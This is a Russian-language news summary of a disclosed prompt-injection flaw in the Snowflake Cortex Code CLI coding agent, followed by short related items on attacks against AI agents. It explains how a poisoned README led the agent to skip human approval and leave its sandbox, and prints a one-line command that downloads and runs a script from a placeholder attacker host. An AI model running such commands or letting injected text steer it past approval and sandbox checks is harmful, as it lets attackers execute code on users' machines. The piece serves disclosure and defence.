Уязвимость в Snowflake Cortex Code CLI позволяла обходить песочницу и выполнять вредоносный код
Детали уязвимости
Snowflake Cortex Code CLI — это командный агент для написания кода, который работает аналогично Claude Code и Codex от OpenAI, со встроенной интеграцией для выполнения SQL в Snowflake. Через два дня после выпуска была обнаружена уязвимость в системе проверки команд Cortex Code, которая позволяла специально сконструированным вредоносным командам выполнять произвольные команды без запуска этапов одобрения человеком и выполнять эти команды вне песочницы Cortex CLI.
Цепочка атаки
Атака работает через косвенную инъекцию промптов. Пользователь открывает Cortex и включает песочницу, затем просит Cortex помочь с сторонней открытой кодовой базой. Инъекция промпта, скрытая в README ненадёжного репозитория, манипулирует Cortex, заставляя его поверить, что необходимо выполнить опасную команду.
Cortex не смог проверить команды внутри выражений подстановки процессов, что позволило выполнить вредоносную команду без одобрения:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Эта команда загружает скрипт с сервера злоумышленника и выполняет его. Обход сработал, потому что:
- Небезопасные команды внутри выражения подстановки процессов <() не оценивались системой проверки
- Полная команда начиналась с «безопасной» команды (в данном случае cat)
- Команды в выражениях подстановки процессов никогда не запускали одобрение человеком
Обход песочницы
Инъекция промпта также манипулирует моделью, чтобы установить флаг, который запускает выполнение команд вне песочницы. По умолчанию Cortex может установить флаг для запуска выполнения команд вне песочницы, и инъекция использует это, чтобы позволить вредоносной команде выполниться вне песочницы.
Устранение
Команда безопасности Snowflake подтвердила и устранила эту уязвимость, выпустив исправление в Cortex Code CLI версии 1.0.25 28 февраля 2026 года. Полное уведомление Snowflake доступно на сайте сообщества Snowflake по адресу: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Примечание: Эта цепочка атак также применялась к пользователям без песочницы. Документация указывает, что в режиме OS+Regular все команды запрашивают одобрение пользователя. Команды, запущенные в песочнице, также имеют ограничения на доступ к сети и файлам.
📖 Read the full source: HN AI Agents
👀 Смотрите также
Три вектора атаки через электронную почту против ИИ-агентов, читающих письма
В посте на Reddit описаны три конкретных метода, которые злоумышленники могут использовать для захвата ИИ-агентов, обрабатывающих электронную почту: Подмена инструкций, Экфильтрация данных и Скрытая передача токенов. Эти методы используют неспособность агента отличить законные инструкции от вредоносных, встроенных в текст письма.
Агент CodeWall AI обнаружил критические уязвимости в платформе Lilli компании McKinsey
Автономный атакующий ИИ-агент CodeWall получил полный доступ на чтение и запись к внутренней базе данных ИИ-платформы Lilli компании McKinsey менее чем за 2 часа, раскрыв 46,5 миллионов сообщений чата, 728 000 файлов и конфиденциальные системные конфигурации через уязвимости SQL-инъекций и IDOR.
Пакет Litellm на PyPI скомпрометирован: вредоносная версия 1.82.8 похищала учетные данные
Пакет litellm на PyPI, который унифицирует вызовы к OpenAI, Anthropic, Cohere и другим провайдерам ИИ, был скомпрометирован вредоносной версией 1.82.8, которая в течение примерно часа выгружала SSH-ключи, облачные учетные данные, API-ключи и другие конфиденциальные данные.
Изоляция AI-агентов с помощью WebAssembly: нулевое доверие по умолчанию
Cosmonic утверждает, что традиционная изоляция (seccomp, bubblewrap) не подходит для AI-агентов из-за фоновых полномочий. Модель на основе возможностей WebAssembly предоставляет нулевые полномочия по умолчанию, требуя явного импорта для файловой системы, сети или учетных данных.